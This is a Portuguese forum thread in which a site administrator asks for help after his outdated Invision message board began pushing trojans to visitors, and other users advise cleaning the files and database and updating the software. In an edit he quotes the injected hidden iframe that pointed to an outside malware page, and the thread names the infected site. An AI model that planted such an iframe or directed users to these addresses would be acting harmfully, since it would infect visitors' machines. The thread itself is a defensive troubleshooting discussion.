Tenho este bicho a espalhar-se através um fórum que corro (uma versão relativamente antiga do invision board, confesso que a culpa é minha mas nunca mais tive paciência para fazer o update desde que o software começou a ser pago ;)), e não faço ideia de como é que a message board ficou infectada nem como remover esta treta de lá (e já andei a fuçar pelo google um bom bocado!)
Antivírus como o Symantec detectam a ameça e param-na com definições de vírus recentes. Em máquinas não protegidas e se for aberto com ie, este saca automaticamente o trojan que é infectado e manda vir mais uns 5 ou 6 trojans. Com o firefox, é pedido para sacar o ficheiro.

Agradecia ajuda neste caso, já que não consigo nem por nada remover a coisa. Já andei a passar a vista nas fontes do fórum e não consigo encontrar nada relativa ao trojan.

Para os que quiserem ver:

ATENÇÃO QUE A PÁGINA ESTÁ INFECTADA, NÃO ABRIR COM IE NEM SEM ANTIVÍRUS ACTUALIZADO: http://tolkienpt.neojag.net

Agradecido

Edit: descobri a linha que fazia o link para o trojan, estava enfiada no wrapper do skin em <iframe src='http://traffall.biz/adv/195/new.php' width=1 height=1></iframe>. Bastou comentar que o link para o trojan desapareceu, mas ainda não tenho ideia de como é que terá entrado e parece-me uma solução muito frágil O_O

Limpa os files to site todo...

Mas o virus pode estar alojado na DB... e ai vai ser um caso complicado limpala....

E já agora depois da ameaça resolvida nada como actualizar o software da board ou arranjar outro, actualizado.

A questão é como fazer isso sem mandar abaixo a board de vez...

Faz uma copia da backup..

utiliza a copia para retirar descobrir como resolver o problema.. isto se o codigo tiver alojado na db.... | Em seguida, a solução passará sempre por meter a board em baixo, e resolver a questão.

Como já saberás a receita será uma questão de minutos.